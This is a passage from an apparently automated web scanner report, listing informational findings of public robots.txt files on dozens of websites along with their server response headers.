GET /robots.txt HTTP/1.0
Host: www.nappturality.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 12 Sep 2010 00:39:36 GMT
ETag: "19e028a-16c-4900536d4e200"
Accept-Ranges: bytes
Content-Length: 364
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1153. http://www.national-college.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.national-college.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.national-college.edu

Response

HTTP/1.1 200 OK
Content-Length: 32
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 16:38:40 GMT
Accept-Ranges: bytes
ETag: "5452669c2facb1:100d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:16:21 GMT
Connection: close

User-agent: *
Disallow: /forms/

27.1154. http://www.nationalbuildersupply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalbuildersupply.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationalbuildersupply.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 22 Dec 2010 18:04:47 GMT
Accept-Ranges: bytes
ETag: "487a21b82a2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:57 GMT
Connection: close
Content-Length: 435

User-agent: *
Disallow: /User/
Disallow: /Profile/
Disallow: /Cart.aspx
Disallow: /Cart.html
Disallow: /cart.aspx
Disallow: /JustAdded.aspx
Disallow: /SaveForLater.aspx
Disallow: /MyCheckout/
...[SNIP]...

27.1155. http://www.nationstarmtg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationstarmtg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationstarmtg.com

Response

HTTP/1.1 200 OK
Content-Length: 338
Content-Type: text/plain
Last-Modified: Wed, 19 Jan 2011 20:31:43 GMT
Accept-Ranges: bytes
ETag: "428a66e217b8cb1:260"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:15:31 GMT
Connection: close

User-agent: *
Disallow: /Admin/
Disallow: /bin/
Disallow: /Controls/
Disallow: /Coremetrics/
Disallow: /Images/
Disallow: /Javascript/
Disallow: /Stylesheets/
Disallow: 404.aspx
Disallow: Acc
...[SNIP]...

27.1156. http://www.nbadraft.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbadraft.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbadraft.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:20:58 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Mon, 28 Mar 2011 11:08:47 GMT
ETag: "e8a1-636-49f88f7c27f5e"
Accept-Ranges: bytes
Content-Length: 1590
Vary: Accept-Encoding
Content-Type: text/plain
Set-Cookie: BALANCEID=balancer.nd2; path=/; domain=.nbadraft.net
Via: 1.0 www.nbadraft.net
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1157. http://www.nbcolympics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcolympics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcolympics.com

Response

HTTP/1.0 200 OK
Content-Length: 95
Content-Type: text/plain
Cache-Control: max-age=60, must-revalidate
Vary: User-Agent
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
ETag: "90c7598b92aaca1:0"
Date: Wed, 04 May 2011 02:08:47 GMT
Connection: close

# NBCOlympics.Com robots.txt file

User-Agent: *
Disallow: /alerts/library/alertMePopup.htmx

27.1158. http://www.ncpiedmontjobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncpiedmontjobs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ncpiedmontjobs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:58 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Tue, 03 May 2011 23:07:15 GMT
Expires: Wed, 04 May 2011 23:07:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 801
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

27.1159. http://www.nethugs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nethugs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nethugs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:20 GMT
Server: Apache
Last-Modified: Mon, 12 May 2008 08:47:29 GMT
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

27.1160. http://www.netreturns.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netreturns.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netreturns.biz

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:10:39 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.1161. http://www.netvibesbusiness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netvibesbusiness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netvibesbusiness.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 02:40:50 GMT
Content-Type: text/plain
Connection: close
X-Men: 13
Content-Length: 37
X-slb: 3
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

User-agent: *
Disallow: /*
Allow: /$

27.1162. http://www.newbernsj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newbernsj.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newbernsj.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:29 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Tue, 03 May 2011 22:01:29 GMT
Expires: Wed, 04 May 2011 22:01:29 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 920
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

27.1163. http://www.newdream.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newdream.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newdream.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:37 GMT
Server: Apache
Last-Modified: Mon, 12 Aug 1996 06:00:51 GMT
ETag: "874001a-6d-2fbd214050ac0"
Accept-Ranges: bytes
Content-Length: 109
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.newdream.net/

User-agent: *
Disallow: /home/.../
Disallow: /home/xprmnt/


27.1164. http://www.newenglandmetalroof.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmetalroof.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newenglandmetalroof.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:07:26 GMT
Server: Apache
Last-Modified: Sun, 20 Jun 2010 18:19:02 GMT
ETag: "809807b-79-4897a38fd9180"
Accept-Ranges: bytes
Content-Length: 121
Connection: close
Content-Type: text/plain

# robots.txt
User-agent: *
Disallow: /estimate_roof_repair.html
Sitemap: http://www.newenglandmetalroof.com/sitemap.xml

27.1165. http://www.newenglandtravelplanner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandtravelplanner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newenglandtravelplanner.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:20 GMT
Server: Apache/2.2.17
Last-Modified: Sat, 12 Jun 2010 14:39:38 GMT
ETag: "2a-488d6399fde80"
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

27.1166. http://www.newhorizon.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newhorizon.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newhorizon.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 02 May 2011 10:34:49 GMT
ETag: "38119d-135-4a24892ad0440"
Accept-Ranges: bytes
Content-Length: 309
Connection: close
Content-Type: text/plain

------------------------------------------------------------
# webmaster@newhorizon.org
User-Agent: *
Disallow: /cgi-bin/
Disallow: /links/database.txt
Disallow: /dragonballz/
Disallow: /credit/
Disal
...[SNIP]...

27.1167. http://www.newjerseyshore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newjerseyshore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newjerseyshore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:36 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 17:42:50 GMT
ETag: "47d00f3-2d-2ee4fa80"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /old-newjerseyshore/

27.1168. http://www.newjobclassifieds.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newjobclassifieds.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newjobclassifieds.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:00 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Fri, 20 Nov 2009 21:24:22 GMT
ETag: "64489-cc-478d419737df9"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1169. http://www.newmediagateway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newmediagateway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newmediagateway.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:37 GMT
Server: Zope/(Zope 2.9.7-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.3-final
X-Cache-Rules-Applied: yes
Content-Type: text/html; charset=iso-8859-15
Content-Length: 548
Connection: close

User-agent: *
Disallow: /for-whom-we-do-it/
Disallow: /ad_manager/
Disallow: /customer-resources/
Disallow: /Members/
Disallow: /what-we-do/resolveuid/
Disallow: /search
Disallow: /author/
Disallow: /
...[SNIP]...

27.1170. http://www.newmexicoindependent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newmexicoindependent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newmexicoindependent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:45 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 14:12:57 GMT
ETag: "1b70e09-23e-4a182745e4c40"
Accept-Ranges: bytes
Content-Length: 574
Connection: close
Content-Type: text/plain

# Google Image
User-agent: Googlebot-Image
Disallow:
Allow: /*

# Google AdSense
User-agent: Mediapartners-Google*
Disallow:
Allow: /*

# digg mirror
User-agent: duggmirror
Disallow: /

User-agent: *

...[SNIP]...

27.1171. http://www.newschief.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newschief.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newschief.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 18:49:45 GMT
Accept-Ranges: bytes
ETag: "28ede78e3e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 19:47:34 GMT
Content-Length: 645
Age: 23386
X-Cache: HIT from nysquid01
X-Cache-Lookup: HIT from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /apps/pbcs.dll/temaoversikt
Disallow: /apps/pbcs.dll/related
Disallow:
...[SNIP]...

27.1172. http://www.newwest.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newwest.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newwest.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 16 Aug 2007 18:29:47 GMT
ETag: "2885fd-85-437d54250dcc0"
Accept-Ranges: bytes
Content-Length: 133
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /private/
Disallow: /secure/
Sitemap: http://www.newwest.net/sitemap.xml

27.1173. http://www.nexcaregive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexcaregive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nexcaregive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:45:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nexcaregive.com/xmlrpc.php
Content-Length: 76
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.nexcaregive.com/sitemap.xml.gz

27.1174. http://www.nextgenboards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextgenboards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextgenboards.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 04 Mar 2009 21:12:12 GMT
ETag: "47e800a-3a-4645181580300"
Accept-Ranges: bytes
Content-Length: 58
Connection: close
Content-Type: text/plain

# robots.txt
User-agent: *
Disallow:
Disallow: /cgi-bin/

27.1175. http://www.nfo.ph/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nfo.ph
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nfo.ph

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:57 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 29 Jul 2010 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 96
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Allow: /

27.1176. http://www.ngksparkplugs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngksparkplugs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ngksparkplugs.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:05:53 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2005 13:51:37 GMT
ETag: "ae5f269321c8c51:ed8"
Content-Length: 261

# The '#' is a comment delimiter.
# To disallow all robots from accessing the site,
# un-comment the following two lines:
# User-agent: *
# Disallow: /

User-agent: *
Disallow: /includes/
Disa
...[SNIP]...

27.1177. http://www.ngmoco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngmoco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ngmoco.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:17:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.10-2ubuntu6.5
Set-Cookie: PHPSESSID=557df0f2404fcfdf70195449ea607404; path=/
X-Pingback: http://www.ngmoco.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1178. http://www.nicholassparks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nicholassparks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nicholassparks.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Fri, 14 Aug 2009 15:20:43 GMT
Accept-Ranges: bytes
ETag: "ea975fcaf21cca1:2eda"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:45:09 GMT
Connection: close

User-agent: *
Allow: /


27.1179. http://www.nicor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nicor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nicor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Jan 2008 23:33:41 GMT
ETag: "3e73-4c-d2ee1f40"
Accept-Ranges: bytes
Content-Length: 76
Connection: close
Content-Type: text/plain

# robots.txt for http://www.nicorinc.com/

User-agent: *
Disallow: /select/

27.1180. http://www.nightshopping.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nightshopping.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nightshopping.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:51 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://nightshopping.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1181. http://www.ningin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ningin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ningin.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:28 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch
Last-Modified: Wed, 29 Oct 2008 03:46:39 GMT
ETag: "6d4a31-11e-45a5c362925c0"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.1182. http://www.nmtc.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nmtc.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nmtc.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:44:31 GMT
Content-Type: text/plain
Content-Length: 62
Last-Modified: Tue, 25 May 2010 20:14:31 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /phpmyadmin
Allow: /
Disallow: /admin

27.1183. http://www.no-ip.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.no-ip.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.no-ip.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:58 GMT
Server: Apache
Last-Modified: Mon, 10 Nov 2008 17:19:49 GMT
ETag: "a08202-236-45b58f85df740"
Accept-Ranges: bytes
Content-Length: 566
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt file for http://www.no-ip.com.com/
#e- mail webmaster@no-ip.com.com for problems

User-agent: *
Disallow: /services/page/plus/track/sf
Disallow: /services.php/mail/reflector/track/sf
Disa
...[SNIP]...

27.1184. http://www.nobelcom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nobelcom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nobelcom.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.24
ETag: "Azjd7PvU/B4"
Last-Modified: Wed, 28 Jul 2010 07:52:24 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Wed, 04 May 2011 01:07:48 GMT
Set-Cookie: JSESSIONID=abci-QT7yxb62huF9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/plain
Content-Length: 307
Date: Wed, 04 May 2011 01:07:43 GMT

User-agent: *
Disallow: /*AFFN=*
Disallow: /*productselection.jsp*
Disallow: /*productdetails.jsp*
Disallow: /phone-cards/calling-Unknown-*
Disallow: /nobelcom/jsp/accounts/*
Disallow: /nobelcom/jsp/h
...[SNIP]...

27.1185. http://www.noodletools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noodletools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.noodletools.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:48 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 00:41:28 GMT
ETag: "d8807c-53-49c334ee8fe00"
Accept-Ranges: bytes
Content-Length: 83
Vary: User-Agent
Connection: close
Content-Type: text/plain
Content-Language: en

user-agent: *
disallow: /quickcite/
disallow: /noodlemanage/
disallow: /savefiles/

27.1186. http://www.northamericanmotoring.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northamericanmotoring.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northamericanmotoring.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:37 GMT
Server: Apache
Last-Modified: Sat, 01 Sep 2007 00:50:37 GMT
ETag: "bb8a31-2a9-4390853e6d140"
Accept-Ranges: bytes
Content-Length: 681
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServernorthamericanmotoring_www_pool=721096876.20480.0000; path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /gallery/

User-agent: Voila
Disallow: /

User-agent: VoilaBot
Disallow: /

User-agent: Slurp
Crawl-delay: 60

User-agent: Twiceler
Disallow: /

User-agent:
...[SNIP]...

27.1187. http://www.northstarmls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northstarmls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northstarmls.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Jun 2010 18:53:24 GMT
ETag: "285c0-636-4889d6ba41100"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:32:34 GMT
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BALANCEID=balancer.www2; path=/; domain=.northstarmls.com
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1188. http://www.northwestfirearms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northwestfirearms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northwestfirearms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Sun, 04 Jul 2010 02:24:43 GMT
ETag: "b08511-2f2-48a8685ddd0c0"
Accept-Ranges: bytes
Content-Length: 754
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/admincp/
Disallow: /forum/backup/
Disallow: /forum/announcement.php
Disallow: /forum/cron.php
Disallow: /forum/editpost.php
Disallow: /forum/faq.php
Disallow: /forum/joi
...[SNIP]...

27.1189. http://www.norwalkreflector.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.norwalkreflector.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.norwalkreflector.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 19:50:43 GMT
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 23:29:31 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1572
Date: Wed, 04 May 2011 01:04:39 GMT
X-Varnish: 1245369902 1244071546
Age: 5708
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 29

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1190. http://www.noticeorange.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noticeorange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.noticeorange.com

Response

HTTP/1.0 200 OK
ETag: "s2h7Hw"
Date: Wed, 04 May 2011 02:03:16 GMT
Expires: Wed, 04 May 2011 02:13:16 GMT
Content-Type: text/plain
Server: Google Frontend
Cache-Control: public, max-age=600
Age: 231

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1191. http://www.novaroma.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.novaroma.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.novaroma.org

Response
